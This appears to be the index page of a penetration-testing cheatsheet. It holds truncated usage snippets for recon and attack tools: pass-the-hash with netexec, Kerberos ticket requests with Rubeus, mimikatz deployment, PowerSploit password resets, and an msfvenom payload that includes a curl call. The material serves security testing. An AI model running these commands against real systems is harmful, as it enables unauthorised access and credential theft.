Hacking
Cheatsheets
Fresh builds
pimp-my-kali I use this to install all tools like impacket and so on .zshrc modifications I’ve...
Tools
autorecon
Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the belo...
nmap
Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 targe...
wpscan
Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p ...
fuff
Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET...
nikto
Basic usage nikto -host http://TARGET_IP -p PORT
gobuster
Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web...
netexec
Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP ...
powerview
1. Enumerate common names Get-DomainComputer | select cn
msf
Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl h...
rubeus
Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt
powersploit
Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forc...
mimikatz
You will need to first upload the binaries to the target, either via a meterpreter shell or power...
ligolo-ng
You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Appl...